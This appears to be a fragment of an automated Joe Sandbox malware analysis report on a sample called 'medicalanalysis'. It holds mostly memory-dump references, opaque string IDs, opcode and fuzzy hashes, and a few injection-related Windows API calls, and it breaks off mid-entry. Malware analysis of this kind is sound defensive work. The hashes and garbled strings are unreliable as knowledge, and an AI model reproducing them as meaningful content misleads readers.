• Instruction Fuzzy Hash: 4B21D636A08B45C1EB00AB44E8807A5B7B4FB88744F914536DA8D43B6ADF7DE165C770
APIs
Memory Dump Source
• Source File: 0000000C.00000002.2912079787.00007FF7600A1000.00000020.00000001.01000000.0000001E.sdmp, Offset: 00007FF7600A0000, based on PE: true
• Associated: 0000000C.00000002.2912046799.00007FF7600A0000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912110390.00007FF7600A9000.00000002.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912141043.00007FF7600AC000.00000004.00000001.01000000.0000001E.sdmp
• Associated: 0000000C.00000002.2912162592.00007FF7600AE000.00000002.00000001.01000000.0000001E.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ff7600a0000_medicalanalysispro.jbxd
Similarity
• API ID: Message$Peek$DispatchMultipleObjectsWait
• String ID:
• API String ID: 2776232527-0
• Opcode ID: 7c1b033473dba301dd4ecd47eb6d04f722b5b1254afffa929906cb3dfbdd32c6
• Instruction ID: 77e6e4e8ef2dbda82d074ed17ae74c33e8dbedab43a3c29c4b4c9f9608368b85
• Opcode Fuzzy Hash: 7c1b033473dba301dd4ecd47eb6d04f722b5b1254afffa929906cb3dfbdd32c6
• Instruction Fuzzy Hash: 2E117B32A28642C7E7609F60E444B76FA91FB99745FC09130D74A42E89DF3DE059CB30

Execution Graph

Execution Coverage: 11.3%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 3.4%
Total number of Nodes: 176
Total number of Limit Nodes: 4
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
Similarity
• API ID:
• String ID: ,aq$4$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
• API String ID: 0-3443518476
• Opcode ID: 2e6bbf57bcd4df2a123880f6019b0459129479cc88deb774f84796fef1b042ee
• Instruction ID: 91a44bf5890652735d5c4076aab7acac71310a4be47829dcbfef66b81c805f82
• Opcode Fuzzy Hash: 2e6bbf57bcd4df2a123880f6019b0459129479cc88deb774f84796fef1b042ee
• Instruction Fuzzy Hash: 59B20834A002188FDB19DFA8C894BADB7B6FF48704F198599E905EB2A5DB70AD41CF50
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
Similarity
• API ID:
• String ID: ,aq$4$$]q$$]q$$]q$$]q
• API String ID: 0-324474496
• Opcode ID: 5ebe98f319097ad1d88a6c96a9bfe4774ef71dbc81201d323dc578ceeb69d33b
• Instruction ID: 9797df0982a8d779d331988a0c43b8ec1ab7d70aa71632f41e6c2b747a0a9e26
• Opcode Fuzzy Hash: 5ebe98f319097ad1d88a6c96a9bfe4774ef71dbc81201d323dc578ceeb69d33b
• Instruction Fuzzy Hash: 3A22F874A00219CFDF19DF64C994BADB7B2BF48305F1481A5E909EB2A5DB31AD81CF50

Control-flow Graph

                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: (t$#$Te]q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-1540733729
                                                                                                                                                                                                                                                                                                                • Opcode ID: b229c3f5d03e053886dcaeb376a507ea0344a46a768b6d66707ac38bcbbb68eb
                                                                                                                                                                                                                                                                                                                • Instruction ID: a5ce37b920950df0203a9ea44551998b430a43379f2f26de659509f77b51e4fc
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b229c3f5d03e053886dcaeb376a507ea0344a46a768b6d66707ac38bcbbb68eb
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B412F870A04219CFDB58DF59D848BADBBF2FB89304F1491A9D80AE7259DB30AD81CF50
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0571F78D
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2856559742.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5710000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 2706961497-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: a4b5d953c160eadb59e3866c69ace113afee410e495f0537fd2c8886dbf1775b
                                                                                                                                                                                                                                                                                                                • Instruction ID: b1f06ae6b2641b0e0ce029f346e0f0923d4b6f8bcf9d8725bccbdcc118150c97
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4b5d953c160eadb59e3866c69ace113afee410e495f0537fd2c8886dbf1775b
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 724178B9D00258DFCF10CFA9D985ADEFBB5BB49310F10942AE815B7210D735A946CFA8
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0571F78D
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2856559742.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5710000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 2706961497-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: b45dfc3003886d00c8e0386f47550550240378dc50a0abddcdb82bdbf22498fe
                                                                                                                                                                                                                                                                                                                • Instruction ID: dc1f1bba0734e0d5b9950a07df09a4c89cd01a8eb8d32885befbea862be79d95
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b45dfc3003886d00c8e0386f47550550240378dc50a0abddcdb82bdbf22498fe
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E4179B9D00258DFCF10CFA9D984ADEFBB1BB49310F10942AE815B7210D735A946CF68
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • NtResumeThread.NTDLL(?,?), ref: 057D1E26
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2857479001.00000000057D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05780000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 0000000D.00000002.2856917881.0000000005780000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5780000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 54a75c2da2840eb123d9116afceb781da53ae6016a3bf4a5709f7a35b3d585c5
                                                                                                                                                                                                                                                                                                                • Instruction ID: 7feaec7e6e36751a37532321b7b1f959890b72c90e8ff9d495ad9210ae1276a2
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54a75c2da2840eb123d9116afceb781da53ae6016a3bf4a5709f7a35b3d585c5
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE3199B5D012189FCB10CFA9D984ADEFBF5BB49310F60942AE815B7210C775A946CFA4
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2860068737.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5d20000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: Ddq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-562783569
                                                                                                                                                                                                                                                                                                                • Opcode ID: 9cfc94ebede6fe605347d8240a072529168c7e69e5798130ab30dfc5e2933f00
                                                                                                                                                                                                                                                                                                                • Instruction ID: 0ede87c90336ab70c0271a91b3c3e9bce983b0ce6c1ed467a324abee87bdca0c
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9cfc94ebede6fe605347d8240a072529168c7e69e5798130ab30dfc5e2933f00
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5FD1B174E00219CFDB54DFA9D994A9DBBB2BF89300F1081AAD409AB365DB34AD81CF51
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: Te]q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-52440209
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858353541.00000000058C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_58c0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: Te]q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-52440209
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858353541.00000000058C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_58c0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: Te]q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-52440209
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2859495393.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5a30000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: daq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-1532007458
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2859495393.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5a30000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: daq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-1532007458
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2830355235.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_a70000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2830355235.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_a70000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2830355235.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_a70000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID:

                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: (aq$(aq$(aq$(aq$(aq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-2150520858
                                                                                                                                                                                                                                                                                                                • Opcode ID: f43cc1ac223d34f878b2b6a5de1668514ed2100f9be54d6defc8425ea4136329
                                                                                                                                                                                                                                                                                                                • Instruction ID: 9f1dd5881219a5da94babbc5ecbf9932dd2cf8a9dde3ad54750416c302664b3e
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f43cc1ac223d34f878b2b6a5de1668514ed2100f9be54d6defc8425ea4136329
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 54A1D1313042558FCB19DF79D8546AE7BE2FF89610B1885A9E906CB392CE35DC028B91

                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: Haq$Haq$Haq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3013282719
                                                                                                                                                                                                                                                                                                                • Opcode ID: 008e1343860553d74d2ac7aeb693aa9bee3c999832be28daf41b2f27df155f3c
                                                                                                                                                                                                                                                                                                                • Instruction ID: 83bad0561814853167f15ffb741f40387e363f9aaaf47a2420a487c3a9b1a966
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 008e1343860553d74d2ac7aeb693aa9bee3c999832be28daf41b2f27df155f3c
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A5125C31A042058FCB18DFA9D585AAEBBF2FF88301F188529E946DB355DB31ED46CB50

                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: 4']q$4']q$4']q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-705557208
                                                                                                                                                                                                                                                                                                                • Opcode ID: 48e118e4dc4b5ea51054b441ac9f0faaa1907c2b0f6baef98303785cb04c3b17
                                                                                                                                                                                                                                                                                                                • Instruction ID: 7c62f5392d7e995f77d28b7ccd6ed5313d09d1126676eec8f3e833fcad9063da
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 48e118e4dc4b5ea51054b441ac9f0faaa1907c2b0f6baef98303785cb04c3b17
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0EF1EB34B10218DFDB08DFA4D998A9DBBB2FF89300F558159E906AB365DB31EC42CB41
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2857624604.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5850000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: 4']q$4']q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3120983240
                                                                                                                                                                                                                                                                                                                • Opcode ID: 13585f4bc5fda936d873f79b87604fbb14d3d8ded4dce8d743fd3acf435c2043
                                                                                                                                                                                                                                                                                                                • Instruction ID: 2e1ad88b2897a59a867fd1011393a4959afe5e5d807ff8b4e387392da51df361
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 13585f4bc5fda936d873f79b87604fbb14d3d8ded4dce8d743fd3acf435c2043
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB42C238E04209CFCB15DF98D588ABEBBB2BB49325F508415ED12AB254CB34AD86CF51

Strings
Memory Dump Source
• Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
Similarity
• API ID:
• String ID: $]q$$]q
• API String ID: 0-127220927
• Opcode ID: 2aea7db4cb41e60fe5473056e7bb2049d3ffda6c5272cebdd7840c1dc41f9cc6
• Instruction ID: b6b9f30da9fc1878d5453eb1bd5267b5ccf1031c3b2882eca8d4f892e28338aa
• Opcode Fuzzy Hash: 2aea7db4cb41e60fe5473056e7bb2049d3ffda6c5272cebdd7840c1dc41f9cc6
• Instruction Fuzzy Hash: 77226B34A106198FCF19DFA4D895AADBBB2FF49305F188415EC12E7298DB34AD42CF90

Control-flow Graph

• Executed
• Not Executed
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2857624604.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_5850000_medicalanalysis.jbxd
Similarity
• API ID:
• String ID: 4']q$4']q
• API String ID: 0-3120983240
• Opcode ID: 2c15698e7137cfc32ca6f3a1f4ce088f983d4925afba8811f9abeb58a8f01a2d
• Instruction ID: b7369ae0b636913494dee575dbb009804ef2d8084607ddbf8b1c79d557c8240a
• Opcode Fuzzy Hash: 2c15698e7137cfc32ca6f3a1f4ce088f983d4925afba8811f9abeb58a8f01a2d
• Instruction Fuzzy Hash: 6422F434E01218CFCB29DFE9D549AACBBB2FF49355F608469E806AB244CB355E85CF41

Control-flow Graph

• Executed
• Not Executed
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2857624604.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_5850000_medicalanalysis.jbxd
Similarity
• API ID:
• String ID: 4']q$4']q
• API String ID: 0-3120983240
• Opcode ID: 982a3809c3d66a3de488bdc305fe67397b352f5e99494eb614afd07bf06c594f
• Instruction ID: 07510ab119447e8cfa26a12b627a539b9cabf626b1c3dedc9d0bf422b807aefd
• Opcode Fuzzy Hash: 982a3809c3d66a3de488bdc305fe67397b352f5e99494eb614afd07bf06c594f
• Instruction Fuzzy Hash: E0F1B238E05208DFCB19DFA4E5996ACBBB2FF49325F604529EC06A7251DB346D86CF40

Control-flow Graph

• Executed
• Not Executed
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2857624604.0000000005850000.00000040.00000800.00020000.00000000.sdmp, Offset: 05850000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_5850000_medicalanalysis.jbxd
Similarity
• API ID:
• String ID: 4']q$4']q
• API String ID: 0-3120983240
• Opcode ID: 58deb61264dc668776d03c72b0bf59726c9588bd92d44b4bc217b0d041044cf8
• Instruction ID: 9ac3cafad432f729af240802e6ba3f82d74a1dfab4fd3e7ee0d51fc1394a7d20
• Opcode Fuzzy Hash: 58deb61264dc668776d03c72b0bf59726c9588bd92d44b4bc217b0d041044cf8
• Instruction Fuzzy Hash: 0AA1DF38E01209CFCB19DFA5D549AADBBB2BF88325F509429EC12A7354CB356D86CF50

Control-flow Graph

• Executed
• Not Executed
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2830355235.0000000000A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_a70000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: PH]q$`Q]q
                                                                                                                                                                                                                                                                                                                • API String ID: 0-2790359648
                                                                                                                                                                                                                                                                                                                • Opcode ID: e2cc8d33ca8db5227a0f0012a5f2cb17038e40e407a7fb0f82a34ba706067db7
                                                                                                                                                                                                                                                                                                                • Instruction ID: 3885692f727e938a9582cfdb30ad765ec6e447fe5de4e99c9a855ca58c2f31f7
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e2cc8d33ca8db5227a0f0012a5f2cb17038e40e407a7fb0f82a34ba706067db7
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AFB1CF74904269CFDB64DFA8DC487EABAB1BB59301F1085EBD40EA2250D7B02EC5DF51

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: (aq$Haq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3785302501
                                                                                                                                                                                                                                                                                                                • Opcode ID: 29b30afac8c8397a6a748d36c5c381cf493234ddd07877031f19eda08bb57c92
                                                                                                                                                                                                                                                                                                                • Instruction ID: d7e0c6f31e94d13fb23b845f6c7736e0f7009f681b7773412ade4582b8d53c52
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 29b30afac8c8397a6a748d36c5c381cf493234ddd07877031f19eda08bb57c92
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 875199307002018FCB19AF39C455A6EBBF6EF89351B2444A9E906DB3A1DF31ED46CB91
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: (aq$Haq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3785302501
                                                                                                                                                                                                                                                                                                                • Opcode ID: 7ce1fb9572d4d28df35125975a8a59c465dad5ea8bb662f38de2cccdb12f97b2
                                                                                                                                                                                                                                                                                                                • Instruction ID: 8d7046411299526b5997426524e252302816704d62dc264759d1085402555cd4
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7ce1fb9572d4d28df35125975a8a59c465dad5ea8bb662f38de2cccdb12f97b2
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D451E3312047408FDB29DF2AC45035ABBF2EF84310F188A69D856CB3A6DF75ED498751
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858353541.00000000058C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058C0000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_58c0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: "$'
                                                                                                                                                                                                                                                                                                                • API String ID: 0-2422873937
                                                                                                                                                                                                                                                                                                                • Opcode ID: 00bc4dbc84f0dbc3d7a1e491420f5ba18ac34ce27e02b9937a49636a1c033566
                                                                                                                                                                                                                                                                                                                • Instruction ID: 08b36b3f1b7bafee3743b8dba4a06fe0bf779c80525c577c40265cea0f613895
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 00bc4dbc84f0dbc3d7a1e491420f5ba18ac34ce27e02b9937a49636a1c033566
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AAF0A474904668CFDB60DF54D844B9ABFF0BB05301F0085DAD849A3280D7349E81CF11
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 0000000D.00000002.2858001141.0000000005890000.00000040.00000800.00020000.00000000.sdmp, Offset: 05890000, based on PE: false
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_5890000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                • String ID: ,aq
                                                                                                                                                                                                                                                                                                                • API String ID: 0-3092978723
                                                                                                                                                                                                                                                                                                                • Opcode ID: 28997af9b9a8d02b07c4caedb49dc19a7b9decf6e13b11d6a69b1f010f94134a
                                                                                                                                                                                                                                                                                                                • Instruction ID: 224e515da1ea5684fee785ebfd40c6f6a996bfcb34103c6c426da35059eded1e
